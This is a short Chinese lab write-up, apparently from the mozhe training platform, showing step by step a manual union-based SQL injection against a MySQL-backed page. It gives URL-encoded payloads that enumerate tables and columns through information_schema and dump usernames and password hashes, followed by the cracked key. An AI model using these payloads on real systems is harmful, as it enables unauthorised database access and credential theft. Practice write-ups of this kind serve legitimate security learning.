当前位置: 首页 > news >正文

SQL手工测试(MySQL数据库)

news 2025/8/25 3:54:10

1.看到注入点,测试列字段数量,发现为4正常,为5出错,可知列数为5

2.找到数据库名mozhe_Discuz_StormGroup

3.查询表名?id=-1%20union%20select%201,2,group_concat(table_name),4%20from%20information_schema.tables%20where%20table_schema=%27mozhe_Discuz_StormGroup%27

得到StormGroup_member,notice

4.查询列名

?id=-1%20union%20select%201,2,group_concat(column_name),4%20from%20information_schema.columns%20where%20table_name=%27StormGroup_member%27

5.获取数据

?id=-1%20union%20select%201,2,concat(name,0x5c,password),4%20from%20StormGroup_member

mozhe\356f589a7df439f6f744ff19bb8092c0

此时发现直接输入会账密错误,说明需要解码

6.将密码解码得到的结果也是始终不正确,考虑其他数据

id=-1%20union%20select%201,2,concat(name,0x5c,password),4%20from%20StormGroup_member%20limit%201,1

mozhe\89f76612d6fbbeb12265a7300301f024

7.再次解密验证

8.成功啦,获得Key:mozhe69c92e07d1330df9daeaeea8738

http://www.dtcms.com/a/238198.html

相关文章:

  • 树莓派超全系列教程文档--(58)通过网络启动树莓派
  • 【LeetCode 热题100】网格路径类 DP 系列题:不同路径 最小路径和(力扣62 / 64 )(Go语言版)
  • 第6章:Neo4j数据导入与导出
  • 自定义连接线程池
  • 408第一季 - 数据结构 - 图
  • mybatis执行insert如何返回id
  • 星耀8上市品鉴暨北京中和吉晟吉利银河用户中心开业媒体见面会
  • 基于多维视角的大模型提升认知医疗过程层次激励编程分析
  • 关于IE浏览器被绑定安装,还卸载不掉
  • RabbitMQ work模型
  • 云原生监控体系建设:Prometheus+Grafana的企业级实践
  • 【11408学习记录】考研写作双核引擎:感谢信+建议信复合结构高分模板(附16年真题精讲)
  • LeetCode - 148. 排序链表
  • 自动驾驶科普(百度Apollo)学习笔记
  • vue.js not detected解决方法
  • LinuxSamba服务器配置篇
  • 三级流水线是什么?
  • 12-OPENCV ROCKX项目 人脸拍照
  • 抖音怎么下载没有水印的视频?
  • 【计算机网络】三报文握手建立TCP连接
  • 【iOS】JSONModel源码学习
  • 台湾TEMI协会竞赛——0、竞赛介绍及开发板介绍
  • 数据类型 -- 转义字符
  • AI架构师如何创建自己的知识库
  • Vue项目PDF目录功能集成【一】——方案深度思考
  • 20-Oracle 23 ai free Database Sharding-特性验证
  • C语言内存管理和编译优化实战
  • 调试快捷键 pycharm vscode
  • 小数据,大智慧:如何用有限数据玩转机器学习训练?
  • .net 可以调试的Windows服务框架Topshelf